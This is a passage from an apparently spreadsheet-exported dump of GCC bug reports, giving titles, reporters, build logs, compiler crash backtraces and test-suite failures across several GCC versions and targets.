-L/home/doehrm/gcc-3.4.0/compile/i386-pc-solaris2.9/libstdc++-v3/src -L/home/do
ehrm/gcc-3.4.0/compile/i386-pc-solaris2.9/libstdc++-v3/src/.libs
-B/opt/gcc34/i386-pc-solari
s2.9/bin/ -B/opt/gcc34/i386-pc-solaris2.9/lib/ -isystem
/opt/gcc34/i386-pc-solaris2.9/includ
e -isystem /opt/gcc34/i386-pc-solaris2.9/sys-include -shared -nostdlib 
/home/doehrm/gcc-3.4
.0/compile/gcc/crti.o /usr/ccs/lib/values-Xa.o
/home/doehrm/gcc-3.4.0/compile/gcc/crtbegin.o
  .libs/allocator.o .libs/codecvt.o .libs/complex_io.o .libs/ctype.o
.libs/debug.o .libs/deb
ug_list.o .libs/functexcept.o .libs/globals_locale.o .libs/globals_io.o
.libs/ios.o .libs/io
s_failure.o .libs/ios_init.o .libs/ios_locale.o .libs/limits.o .libs/list.o
.libs/locale.o .
libs/locale_init.o .libs/locale_facets.o .libs/localename.o .libs/stdexcept.o
.libs/strstrea
m.o .libs/tree.o .libs/allocator-inst.o .libs/concept-inst.o
.libs/fstream-inst.o .libs/ext-
inst.o .libs/io-inst.o .libs/istream-inst.o .libs/locale-inst.o
.libs/locale-misc-inst.o .li
bs/misc-inst.o .libs/ostream-inst.o .libs/sstream-inst.o .libs/streambuf-inst.o
.libs/string
-inst.o .libs/valarray-inst.o .libs/wlocale-inst.o .libs/wstring-inst.o
.libs/atomicity.o .l
ibs/codecvt_members.o .libs/collate_members.o .libs/ctype_members.o
.libs/messages_members.o
 .libs/monetary_members.o .libs/numeric_members.o .libs/time_members.o
.libs/basic_file.o .l
ibs/c++locale.o .libs/libstdc++.lax/libmath.a/stubs.o
.libs/libstdc++.lax/libmath.a/copysign
f.o .libs/libstdc++.lax/libmath.a/signbit.o
.libs/libstdc++.lax/libmath.a/signbitf.o  .libs/
libstdc++.lax/libsupc++convenience.a/del_op.o
.libs/libstdc++.lax/libsupc++convenience.a/del
_opnt.o .libs/libstdc++.lax/libsupc++convenience.a/del_opv.o
.libs/libstdc++.lax/libsupc++co
nvenience.a/del_opvnt.o .libs/libstdc++.lax/libsupc++convenience.a/eh_alloc.o
.libs/libstdc+
+.lax/libsupc++convenience.a/eh_aux_runtime.o
.libs/libstdc++.lax/libsupc++convenience.a/eh_
catch.o .libs/libstdc++.lax/libsupc++convenience.a/eh_exception.o
.libs/libstdc++.lax/libsup
c++convenience.a/eh_globals.o
.libs/libstdc++.lax/libsupc++convenience.a/eh_personality.o .l
ibs/libstdc++.lax/libsupc++convenience.a/eh_term_handler.o
.libs/libstdc++.lax/libsupc++conv
enience.a/eh_terminate.o .libs/libstdc++.lax/libsupc++convenience.a/eh_throw.o
.libs/libstdc
++.lax/libsupc++convenience.a/eh_type.o
.libs/libstdc++.lax/libsupc++convenience.a/eh_unex_h
andler.o .libs/libstdc++.lax/libsupc++convenience.a/guard.o
.libs/libstdc++.lax/libsupc++con
venience.a/new_handler.o .libs/libstdc++.lax/libsupc++convenience.a/new_op.o
.libs/libstdc++
.lax/libsupc++convenience.a/new_opnt.o
.libs/libstdc++.lax/libsupc++convenience.a/new_opv.o 
.libs/libstdc++.lax/libsupc++convenience.a/new_opvnt.o
.libs/libstdc++.lax/libsupc++convenie
nce.a/pure.o .libs/libstdc++.lax/libsupc++convenience.a/tinfo.o
.libs/libstdc++.lax/libsupc+
+convenience.a/tinfo2.o .libs/libstdc++.lax/libsupc++convenience.a/vec.o
.libs/libstdc++.lax
/libsupc++convenience.a/vterminate.o
.libs/libstdc++.lax/libsupc++convenience.a/cp-demangle.
o   -L/home/doehrm/gcc-3.4.0/compile/i386-pc-solaris2.9/libstdc++-v3/src
-L/home/doehrm/gcc-
3.4.0/compile/i386-pc-solaris2.9/libstdc++-v3/src/.libs -lm
../libmath/.libs/libmath.a -lm .
./libsupc++/.libs/libsupc++convenience.a -lm
-L/home/doehrm/gcc-3.4.0/compile/gcc -L/usr/ccs
/bin -L/usr/ccs/lib -lgcc_s -lgcc_s -lm -lgcc_s -lgcc_s   -lc
/home/doehrm/gcc-3.4.0/compile
/gcc/crtend.o /home/doehrm/gcc-3.4.0/compile/gcc/crtn.o  -Wl-h
-Wllibstdc++.so.6 -o .libs/
libstdc++.so.6.0.0
Textverschiebung beibehalten                    referenziert
    gegen Symbol                    Offset      in Datei
.LTHUNK12                           0xe         .libs/fstream-inst.o
.LTHUNK12                           0xe         .libs/sstream-inst.o
.LTHUNK13                           0xe         .libs/fstream-inst.o
.LTHUNK13                           0x1a        .libs/sstream-inst.o
.LTHUNK14                           0xe         .libs/fstream-inst.o
.LTHUNK14                           0xe         .libs/sstream-inst.o
.LTHUNK15                           0xe         .libs/fstream-inst.o
.LTHUNK15                           0x1a        .libs/sstream-inst.o
.LTHUNK17                           0x1a        .libs/fstream-inst.o
.LTHUNK17                           0x1a        .libs/sstream-inst.o
.LTHUNK21                           0x1a        .libs/fstream-inst.o
.LTHUNK21                           0x1a        .libs/sstream-inst.o
.LTHUNK22                           0xe         .libs/fstream-inst.o
.LTHUNK22                           0xe         .libs/sstream-inst.o
.LTHUNK23                           0x1a        .libs/fstream-inst.o
.LTHUNK23                           0x1a        .libs/sstream-inst.o
.LTHUNK0                            0xe         .libs/strstream.o
.LTHUNK0                            0xe         .libs/io-inst.o
.LTHUNK0                            0xe         .libs/fstream-inst.o
.LTHUNK0                            0xe         .libs/istream-inst.o
.LTHUNK0                            0xe         .libs/ostream-inst.o
.LTHUNK0                            0xe         .libs/sstream-inst.o
.LTHUNK2                            0xe         .libs/strstream.o
.LTHUNK2                            0xe         .libs/io-inst.o
.LTHUNK2                            0xe         .libs/fstream-inst.o
.LTHUNK2                            0xe         .libs/istream-inst.o
.LTHUNK2                            0xe         .libs/ostream-inst.o
.LTHUNK2                            0xe         .libs/sstream-inst.o
.LTHUNK4                            0xe         .libs/strstream.o
.LTHUNK4                            0xe         .libs/fstream-inst.o
.LTHUNK4                            0xe         .libs/io-inst.o
.LTHUNK4                            0xe         .libs/sstream-inst.o
.LTHUNK6                            0xe         .libs/strstream.o
.LTHUNK6                            0xe         .libs/fstream-inst.o
.LTHUNK6                            0xe         .libs/io-inst.o
.LTHUNK6                            0xe         .libs/sstream-inst.o
.LTHUNK7                            0xe         .libs/strstream.o
.LTHUNK7                            0xe         .libs/fstream-inst.o
.LTHUNK7                            0x1a        .libs/io-inst.o
.LTHUNK7                            0xe         .libs/sstream-inst.o
.LTHUNK8                            0xe         .libs/strstream.o
.LTHUNK8                            0xe         .libs/fstream-inst.o
.LTHUNK8                            0xe         .libs/sstream-inst.o
.LTHUNK9                            0x1a        .libs/strstream.o
.LTHUNK9                            0x1a        .libs/fstream-inst.o
.LTHUNK9                            0x1a        .libs/sstream-inst.o
.LTHUNK10                           0xe         .libs/strstream.o
.LTHUNK10                           0xe         .libs/fstream-inst.o
.LTHUNK10                           0xe         .libs/sstream-inst.o
.LTHUNK11                           0x1a        .libs/strstream.o
.LTHUNK11                           0x1a        .libs/fstream-inst.o
.LTHUNK11                           0x1a        .libs/sstream-inst.o
.LTHUNK3                            0x6         .libs/strstream.o
.LTHUNK3                            0x1a        .libs/io-inst.o
.LTHUNK3                            0x1a        .libs/fstream-inst.o
.LTHUNK3                            0xe         .libs/istream-inst.o
.LTHUNK3                            0xe         .libs/ostream-inst.o
.LTHUNK3                            0xe         .libs/sstream-inst.o
.LTHUNK5                            0xe         .libs/strstream.o
.LTHUNK5                            0xe         .libs/fstream-inst.o
.LTHUNK5                            0x1a        .libs/io-inst.o
.LTHUNK5                            0xe         .libs/sstream-inst.o
.LTHUNK19                           0x1a        .libs/fstream-inst.o
.LTHUNK19                           0x1a        .libs/sstream-inst.o
.LTHUNK16                           0xe         .libs/fstream-inst.o
.LTHUNK16                           0xe         .libs/sstream-inst.o
.LTHUNK20                           0xe         .libs/fstream-inst.o
.LTHUNK20                           0xe         .libs/sstream-inst.o
.LTHUNK1                            0x6         .libs/strstream.o
.LTHUNK1                            0x1a        .libs/io-inst.o
.LTHUNK1                            0x1a        .libs/fstream-inst.o
.LTHUNK1                            0xe         .libs/istream-inst.o
.LTHUNK1                            0xe         .libs/ostream-inst.o
.LTHUNK1                            0xe         .libs/sstream-inst.o
.LTHUNK18                           0xe         .libs/fstream-inst.o
.LTHUNK18                           0xe         .libs/sstream-inst.o
ld: Schwerer Fehler: Verschiebungen verbleiben gegen zuweisbare aber
nicht-schreibbare Bere
iche
collect2: ld returned 1 exit status
gmake[4]: *** [libstdc++.la] Error 1
gmake[4]: Leaving directory
`/home/doehrm/gcc-3.4.0/compile/i386-pc-solaris2.9/libstdc++-v3/
src'
gmake[3]: *** [all-recursive] Error 1
gmake[3]: Leaving directory
`/home/doehrm/gcc-3.4.0/compile/i386-pc-solaris2.9/libstdc++-v3'
gmake[2]: *** [all] Error 2
doehrm@penelope ~/gcc-3.4.0/compile&gt;uname -a
SunOS penelope 5.9 Generic_112234-12 i86pc i386 i86pc
I used
doehrm@penelope ~/gcc-3.4.0/compile&gt;cc -V
cc: Sun WorkShop 6 update 2 C 5.3 Patch 111680-09 2003/05/18
usage: cc [ options] files.  Use 'cc -flags' for details
to bootstrap the compiler.
The configuration was done using
../configure --prefix=/opt/gcc34 --enable-shared --enable-languages=cc++</t>
  </si>
  <si>
    <t>markus.doehr</t>
  </si>
  <si>
    <t>GCC-63823</t>
  </si>
  <si>
    <t>[5.0 Regression] MIPS will not build due to LRA ICE with 64 bit ABI</t>
  </si>
  <si>
    <t>My x86 to MIPS build is failing when the new compiler cannot compile a file from glibc.  A cut-down preprocessed test case is attached.  It only fails with the 64 bit ABI with LRA and with -O2 -g.
% install-mips-linux-gnu/bin/mips-linux-gnu-gcc -mips64r2 -mabi=64 -O2 -g -c x.c
x.c: In function '__ieee754_jnl':
x.c:73:1: internal compiler error: in alter_subregs at lra-spills.c:633
 }
 ^
0x8ddafa alter_subregs
	/scratch/sellcey/repos/ice/src/gcc/gcc/lra-spills.c:633
0x8df1fd lra_final_code_change()
	/scratch/sellcey/repos/ice/src/gcc/gcc/lra-spills.c:739
0x8c48fb lra(_IO_FILE*)
	/scratch/sellcey/repos/ice/src/gcc/gcc/lra.c:2358
0x880729 do_reload
	/scratch/sellcey/repos/ice/src/gcc/gcc/ira.c:5380
0x880729 execute
	/scratch/sellcey/repos/ice/src/gcc/gcc/ira.c:5550
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-18198</t>
  </si>
  <si>
    <t>[4.0 Regression] bootstrap stage2 build of fname-uf.adb causes ICE</t>
  </si>
  <si>
    <t>stage1/xgcc -Bstage1/ -B/usr/local/ada/powerpc-apple-darwin7.5.0/bin/ -c -g -O2
-mdynamic-no-pic      -gnatpg -gnata -I- -I. -Iada -I../../fsf-gcc-head/gcc/ada
../../fsf-gcc-head/gcc/ada/fname-uf.adb -o  ada/fname-uf.o
../../fsf-gcc-head/gcc/ada/fname-uf.adb: In function 'Fname.Uf.Get_File_Name':
../../fsf-gcc-head/gcc/ada/fname-uf.adb:174: error: Type mismatch between an
SSA_NAME and its symbol.
../../fsf-gcc-head/gcc/ada/fname-uf.adb:174: error: Missing definition for
SSA_NAME: dot_277in statement: dot_66 = PHI 
+===========================GNAT BUG DETECTED==============================+
| 4.0.0 20041027 (experimental) (powerpc-apple-darwin7.5.0) GCC error:  |
| verify_ssa failed.                                                    |
| Error detected at fname-uf.adb:611:12                                 |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.         |
| Include the entire contents of this bug box in the report.            |
| Include the exact gcc or gnatmake command that you entered.           |
| Also include sources listed below in gnatchop format                  |
| (concatenated together with no headers between files).                |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
../../fsf-gcc-head/gcc/ada/fname-uf.adb
../../fsf-gcc-head/gcc/ada/fname-uf.ads
../../fsf-gcc-head/gcc/ada/fname.ads
../../fsf-gcc-head/gcc/ada/types.ads
../../fsf-gcc-head/gcc/ada/casing.ads
../../fsf-gcc-head/gcc/ada/alloc.ads
../../fsf-gcc-head/gcc/ada/debug.ads
../../fsf-gcc-head/gcc/ada/fmap.ads
../../fsf-gcc-head/gcc/ada/krunch.ads
../../fsf-gcc-head/gcc/ada/namet.ads
../../fsf-gcc-head/gcc/ada/table.ads
../../fsf-gcc-head/gcc/ada/opt.ads
../../fsf-gcc-head/gcc/ada/gnatvsn.ads
../../fsf-gcc-head/gcc/ada/hostparm.ads
../../fsf-gcc-head/gcc/ada/osint.ads
../../fsf-gcc-head/gcc/ada/uname.ads
../../fsf-gcc-head/gcc/ada/widechar.ads
../../fsf-gcc-head/gcc/ada/table.adb
../../fsf-gcc-head/gcc/ada/output.ads
../../fsf-gcc-head/gcc/ada/tree_io.ads
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [ada/fname-uf.o] Error 1
make[1]: *** [stage2_build] Error 2
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>awreynolds</t>
  </si>
  <si>
    <t>GCC-61136</t>
  </si>
  <si>
    <t>[4.10 Regression] ice in tree_nop_conversion</t>
  </si>
  <si>
    <t>Created attachment 32773
gzipped C source code
I just tried to compile the attached code derived from the Linux kernel
with flag -O2 on trunk dated 20140509 and it said
mm/slub.c: In function â€˜slab_orderâ€™:
mm/slub.c:2774:3: internal compiler error: Segmentation fault
   return get_order(size * MAX_OBJS_PER_PAGE) - 1
   ^
0x98391f crash_signal
    ../../src/trunk/gcc/toplev.c:337
0xb68634 tree_nop_conversion
    ../../src/trunk/gcc/tree.c:11483
0xb68634 tree_strip_nop_conversions
    ../../src/trunk/gcc/tree.c:11534
valgrind says
==21347== Invalid read of size 2
==21347==    at 0xB68634: integer_zerop(tree_node const*) (tree.c:11483)
==21347==    by 0x74C413: multiple_of_p(tree_node* tree_node const* tree_node const*) (fold-const.c:15308)
==21347==    by 0x74C3F8: multiple_of_p(tree_node* tree_node const* tree_node const*) (fold-const.c:15273)
==21347==    by 0x741D02: fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*) (fold-const.c:11749)
==21347==    by 0x7434EA: fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*) (fold-const.c:14995)
==21347==    by 0x5A69DD: c_fully_fold_internal(tree_node* bool bool* bool*) (c-common.c:1303)
==21347==    by 0x5A7062: c_fully_fold(tree_node* bool bool*) (c-common.c:1097)
==21347==    by 0x546D04: build_binary_op(unsigned int tree_code tree_node* tree_node* int) (c-typeck.c:10953)
==21347==    by 0x54357A: c_objc_common_truthvalue_conversion(unsigned int tree_node*) (c-typeck.c:11116)
==21347==    by 0x562671: c_parser_conditional_expression(c_parser* c_expr* tree_node*) (c-parser.c:5962)
==21347==    by 0x5627BB: c_parser_conditional_expression(c_parser* c_expr* tree_node*) (c-parser.c:5982)
==21347==    by 0x562BB0: c_parser_expr_no_commas(c_parser* c_expr* tree_node*) [clone .constprop.45] (c-parser.c:5848)
==21347==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==21347==</t>
  </si>
  <si>
    <t>GCC-8919</t>
  </si>
  <si>
    <t>ICE with (possibly invalid) extended asm.</t>
  </si>
  <si>
    <t>~/c++/libecc/testsuite/polynomial&gt;g++-3.2 -O6 -fomit-frame-pointer -W -Wall -mcpu=athlon -I./../../include  -c polynomialTest.cc -o polynomialTest.o -save-temps -v
Reading specs from /usr/local/gcc-3.2/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: /usr/src/gcc/gcc-3.2/configure --prefix=/usr/local/gcc-3.2 --enable-shared --with-gnu-as --with-gnu-ld --enable-languages=c++ --enable-debug --enable-threads
Thread model: posix
gcc version 3.2
 /usr/local/gcc-3.2/lib/gcc-lib/i686-pc-linux-gnu/3.2/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -I./../../include -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_athlon__ polynomialTest.cc -W -Wall polynomialTest.ii
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/gcc-3.2/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 ../../include
 /usr/local/gcc-3.2/include/c++/3.2
 /usr/local/gcc-3.2/include/c++/3.2/i686-pc-linux-gnu
 /usr/local/gcc-3.2/include/c++/3.2/backward
 /usr/local/include
 /usr/local/gcc-3.2/include
 /usr/local/gcc-3.2/lib/gcc-lib/i686-pc-linux-gnu/3.2/include
 /usr/include
End of search list.
 /usr/local/gcc-3.2/lib/gcc-lib/i686-pc-linux-gnu/3.2/cc1plus -fpreprocessed polynomialTest.ii -quiet -dumpbase polynomialTest.cc -mcpu=athlon -O6 -W -Wall -version -fomit-frame-pointer -o polynomialTest.s
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2 (i686-pc-linux-gnu)
        compiled by GNU C version 3.2.
../../include/libecc/bitset.h: In member function `libecc::polynomial&amp;
   libecc::polynomial::operator/=(const libecc::polynomial&amp;) [with
   unsigned int m = 3 unsigned int k = 1]':
../../include/libecc/bitset.h:936: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Attached is polynomialTest.ii.bz2
Release:
3.2
Environment:
athlon-gnu-linux</t>
  </si>
  <si>
    <t>GCC-39257</t>
  </si>
  <si>
    <t>[4.4 Regression] Revision 144348 breaks bootstrap</t>
  </si>
  <si>
    <t>On Linux/ia64 gcc revision 144352 gave:
configure:2611: /export/gnu/import/svn/gcc-test/bld/./gcc/xgcc -B/export/gnu/import/svn/gcc-test/bld/./gcc/ -B/usr/local/ia64-unknown-linux-gnu/bin/ -B/usr/local/ia64-unknown-linux-gnu/lib/ -isystem /usr/local/ia64-unknown-linux-gnu/include -isystem /usr/local/ia64-unknown-linux-gnu/sys-include -c -g -O2    conftest.c &gt;&amp;5
xgcc: Internal error: Segmentation fault (program cc1)
Please submit a full bug report.
See  for instructions.
configure:2614: $? = 1
configure: failed program was:
| /* confdefs.h.  */
|
| #define PACKAGE_NAME GNU C Runtime Library
| #define PACKAGE_TARNAME libgcc
| #define PACKAGE_VERSION 1.0
| #define PACKAGE_STRING GNU C Runtime Library 1.0
| #define PACKAGE_BUGREPORT 
| /* end confdefs.h.  */
| int
| main ()
| {
|
|   
|   return 0
| }
...
make[5]: *** [configure-stage2-target-libgcc] Error 1
Revision 144346 is OK. The changes are
r144346 | bkoz | 2009-02-20 19:56:21 -0800 (Fri 20 Feb 2009) | 12 lines
r144348 | rsandifo | 2009-02-21 01:15:13 -0800 (Sat 21 Feb 2009) | 7 lines
r144349 | uros | 2009-02-21 01:34:36 -0800 (Sat 21 Feb 2009) | 4 lines
r144352 | gerald | 2009-02-21 03:12:28 -0800 (Sat 21 Feb 2009) | 3 lines
I think revision 144348 is the cause.</t>
  </si>
  <si>
    <t>GCC-1539</t>
  </si>
  <si>
    <t>GCC latest snapshot - ICE</t>
  </si>
  <si>
    <t>grobh</t>
  </si>
  <si>
    <t>GCC-11310</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE with -ftime-report</t>
  </si>
  <si>
    <t>Try to compile any source code (does not have to be valid) and add the option -ftime-
report you will recieve an seg fault.
See  for more information on the 
bug.</t>
  </si>
  <si>
    <t>GCC-83612</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/ubsan/object-size-9.c   -O2  output pattern test</t>
  </si>
  <si>
    <t>For x86_64 -m32 I observed:
...
PASS: gcc.dg/ubsan/object-size-9.c   -O2  (test for excess errors)
PASS: gcc.dg/ubsan/object-size-9.c   -O2  execution test
FAIL: gcc.dg/ubsan/object-size-9.c   -O2  output pattern test is gcc.dg/ubsan/object-size-9.c:11:13: runtime error: load of address 0x000000600ff2 with insufficient space for an object of type 'char'
PASS: gcc.dg/ubsan/object-size-9.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (test for excess errors)
PASS: gcc.dg/ubsan/object-size-9.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  execution test
FAIL: gcc.dg/ubsan/object-size-9.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  output pattern test is gcc.dg/ubsan/object-size-9.c:11:13: runtime error: load of address 0x000000600ff2 with insufficient space for an object of type 'char'
PASS: gcc.dg/ubsan/object-size-9.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  (test for excess errors)
PASS: gcc.dg/ubsan/object-size-9.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  execution test
PASS: gcc.dg/ubsan/object-size-9.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  output pattern test load of address [^
UNSUPPORTED: gcc.dg/ubsan/object-size-9.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions
UNSUPPORTED: gcc.dg/ubsan/object-size-9.c   -O3 -g
UNSUPPORTED: gcc.dg/ubsan/object-size-9.c   -Os
...</t>
  </si>
  <si>
    <t>GCC-7492</t>
  </si>
  <si>
    <t>C:\djgpp\work&gt;gcc scenix2.cc -o scenix2.exe -lm -Wno-deprecated
scenix2.cc: In function `int ReadTimeStampCounter()':
scenix2.cc:55: Internal compiler error in instantiate_virtual_regs_1 at
   function.c:3974
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
C:\djgpp\work&gt;
Release:
gcc 3.1
Environment:
win2k
How-To-Repeat:
gcc scenix2.cc -o scenix2.exe -lm -Wno-deprecated</t>
  </si>
  <si>
    <t>GCC-54731</t>
  </si>
  <si>
    <t>[4.8 regression] arm-elf/arm-eabisim crosses fails in make-check due to undefined LFE references: corrupt debug_line tables</t>
  </si>
  <si>
    <t>trunk sources host is x86/linux target is cross arm-elf or arm-eabisim has a bunch of fails in libstdc++ due to unresolved references to .LFE1602 etc references.
These are keyed to out-of-line destructors (_ZThn8_NSt* mangled symbols) in:
strstream.o
sstream.o
iostream-inst.o
fstream-inst.o
this causes failed linking in the check-c++ check-libstdc++ testsuite.</t>
  </si>
  <si>
    <t>GCC-17676</t>
  </si>
  <si>
    <t>Problem with user operator</t>
  </si>
  <si>
    <t>We have the following failures on SPARC:
FAIL: gfortran.fortran-torture/execute/userop.f90 compilation  -O0 
FAIL: gfortran.fortran-torture/execute/userop.f90 compilation  -O1 
FAIL: gfortran.fortran-torture/execute/userop.f90 compilation  -O2 
FAIL: gfortran.fortran-torture/execute/userop.f90 compilation  -O3
-fomit-frame-pointer 
FAIL: gfortran.fortran-torture/execute/userop.f90 compilation  -O3
-fomit-frame-pointer -funroll-loops 
FAIL: gfortran.fortran-torture/execute/userop.f90 compilation  -O3
-fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gfortran.fortran-torture/execute/userop.f90 compilation  -O3 -g 
FAIL: gfortran.fortran-torture/execute/userop.f90 compilation  -Os 
The problem is at resolve.c:1418:
	sprintf (msg Operands of user operator '%s' at %%L are %s/%s
		 e-&gt;uop-&gt;ns-&gt;proc_name-&gt;name gfc_typename (&amp;op1-&gt;ts)
		 gfc_typename (
e-&gt;uop-&gt;ns-&gt;proc_name is NULL.  So an out-of-bounds address is passed to sprintf
and we get a SIGSEGV inside the libc.  Note that we don't get it with a
cross-compiler on Linux/x86 but the address is NULL there anyway.</t>
  </si>
  <si>
    <t>GCC-17267</t>
  </si>
  <si>
    <t>Reuse of template parameter name not diagnosed</t>
  </si>
  <si>
    <t>Comeau rejects this while GCC accepts it:
template  class C&gt;
void f ()
{ }
WilX@amber2:::~/tmp&gt; g++-3.5 -v
Reading specs from /usr/local/lib/gcc/i686-pc-cygwin/3.5.0/specs
Configured with: ../srcdir/configure --with-gcc --with-gnu-ld --with-gnu-as --en
able-languages=cc++objc --enable-threads=posix --with-system-zlib --enable-nls
 --without-included-gettext --enable-sjlj-exceptions --enable-version-specific-r
untime-libs --enable-shared --disable-win32-registry --enable-dwarf2 --with-cpu=
athlon-tbird --with-arch=athlon-tbird --program-suffix=-3.5
Thread model: posix
gcc version 3.5.0 20040826 (experimental)</t>
  </si>
  <si>
    <t>GCC-36365</t>
  </si>
  <si>
    <t>[4.3 Regression] Hang in df_analyze</t>
  </si>
  <si>
    <t>On the attached testcase with -O1 cc1plus either hangs or spends enormous amount of time in:
#7  0x00000000007d9a4b in df_analyze () at ../../gcc/df-core.c:1265
#8  0x00000000009a7935 in find_defs (loop=0x7f67f7de3dc0 body=0x669f640) at ../../gcc/loop-invariant.c:644
#9  0x00000000009a861e in find_invariants (loop=0x7f67f7de3dc0) at ../../gcc/loop-invariant.c:945
#10 0x00000000009a9365 in move_single_loop_invariants (loop=0x7f67f7de3dc0) at ../../gcc/loop-invariant.c:1317
#11 0x00000000009a93d8 in move_loop_invariants () at ../../gcc/loop-invariant.c:1347
#12 0x00000000009a60f3 in rtl_move_loop_invariants () at ../../gcc/loop-init.c:243
(so far I've been waiting 10 minutes).</t>
  </si>
  <si>
    <t>GCC-51083</t>
  </si>
  <si>
    <t>TR1 [tr.c99.cmath.over] and C++11 [cmplx.over] overloads not constrained</t>
  </si>
  <si>
    <t>Hi
I'm using gcc 4.6.2 on Mac OS 10.6. 
When using the gnu++0x flag gcc fails to compile the attached (preprocessed) source otherwise everything works as expected.
I am using a math library called 'armadillo' which overloads functions already present in namespace std eg std::imag() and arma::imag().
As long as one specifies the namespace explicitly the code compiles. However the following does not work:
using namespace std
using namespace arma
imag(std::foo)
imag(arma::bar) // &lt;- compile error
I call the compiler with the following commands:
g++-mp-4.6 -I/usr/local/include -O0 -g3 -Wall -c -fmessage-length=0 -std=gnu++0x  -fno-strict-aliasing -fwrapv -save-temps -MMD -MP -MFmain.d -MTmain.d -o main.o ../main.cpp
The error message:
error: conversion from '__gnu_cxx::__promote &gt; false&gt;::__type {aka arma::Mat &gt;}' to non-scalar type 'arma::mat {aka arma::Mat}' requested</t>
  </si>
  <si>
    <t>jochenzimmermann</t>
  </si>
  <si>
    <t>GCC-52599</t>
  </si>
  <si>
    <t>ICE on illegal constexpr constructor declaration</t>
  </si>
  <si>
    <t>Created attachment 26902
This test make g++ to assert
when compiling attach file with 'g++ -std=c++0x test.cpp' compiler assert in build_constexpr_constructor_member_initializers function from cp/semantics.c.
g++ should instead return an error since construct is illegal.</t>
  </si>
  <si>
    <t>GCC-40473</t>
  </si>
  <si>
    <t>-mno-sched-prolog breaks function parameter debug location lists</t>
  </si>
  <si>
    <t>/* When compiled with -g -O -mno-sched-prolog the debug info location
   lists for p1 and p2 do not cover the start of f.  There are other
   inaccuracies but not covering the start of the function is specific
   to -nno-sched-prolog.  */
int f (int p1 int p2)
{
  extern int bar (int)
  int x y
  for (x = p1 y = 0 x &lt; p2 x++)
    y += bar (x)
  return y
}</t>
  </si>
  <si>
    <t>GCC-19735</t>
  </si>
  <si>
    <t>Grammar error in error message.</t>
  </si>
  <si>
    <t>When fed with the following code:  
    unsigned char val = -1 
gcc-4.0.0 20050130 (experimental) reports:  
warning: converting of negative value '-0x000000001' to 'unsigned char' 
As for my feeling it should correctly say conversion of... or converting  
but not converting of....</t>
  </si>
  <si>
    <t>GCC-18818</t>
  </si>
  <si>
    <t>ACATS cd10002 fails at runtime</t>
  </si>
  <si>
    <t>Fails on x86 and x86_64 no analysis yet. From my old notes started failing
between:
LAST_UPDATED: Fri Sep 17 17:12:56 UTC 2004
LAST_UPDATED: Fri Sep 17 22:17:43 UTC 2004
.. CD10002 ACATS 2.5 04-12-03 22:30:27
---- CD10002 Check that operational items are allowed in some contexts
                where representation items are not.
   - CD10002 Check that the name of an incompletely defined type can be 
                used when specifying an operational item.
   * CD10002 Incorrect calls to the stream attributes for Priv.T1.
   * CD10002 Incorrect calls to the stream attributes for Priv.T2.
   - CD10002 Check that operational items can be specified for a
                descendant of a generic formal untagged type.
   - CD10002 Check that operational items can be specified for a derived
                untagged type even if the parent type is a by-reference 
                type or has user-defined primitive subprograms.
**** CD10002 FAILED ****************************.</t>
  </si>
  <si>
    <t>kenner</t>
  </si>
  <si>
    <t>GCC-34407</t>
  </si>
  <si>
    <t>verify_stmts failed</t>
  </si>
  <si>
    <t>I just tried to compile Suse Linux package GraphicsMagick-1.1.10-11
with the GNU C compiler version 4.3 snapshot 20071207 and
the compiler said
rle.c: In function 'ReadRLEImage':
rle.c:116: error: incorrect sharing of tree nodes
prologue_after_cost_adjust.421_1336 = (long unsigned int) D.8406_92
(long unsigned int) D.8406_92
rle.c:116: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flags -O2 -ftree-vectorize
required.</t>
  </si>
  <si>
    <t>GCC-50106</t>
  </si>
  <si>
    <t>[ARM] Wrong code with -march=armv5t -mthumb -Os</t>
  </si>
  <si>
    <t>Created attachment 25028
Sample code.
Command line:
arm-rtemseabi4.11-g++ -march=armv5t -mthumb -Os -S compiler1.test.ii -o compiler1.test.eabi.Os.s
arm-rtemseabi4.11-g++ -march=armv5t -mthumb -O2 -S compiler1.test.ii -o compiler1.test.eabi.O2.s
Relevant function:
extern _TestStruct _GetIDS(unsigned int Index)
{
  if (Index &lt; _LIST_SIZE) {
    return _List[Index]
  } else {
    return _List[0]
  }
}
Partial content of compiler1.test.eabi.Os.s with comments:
        .text
        .align  1
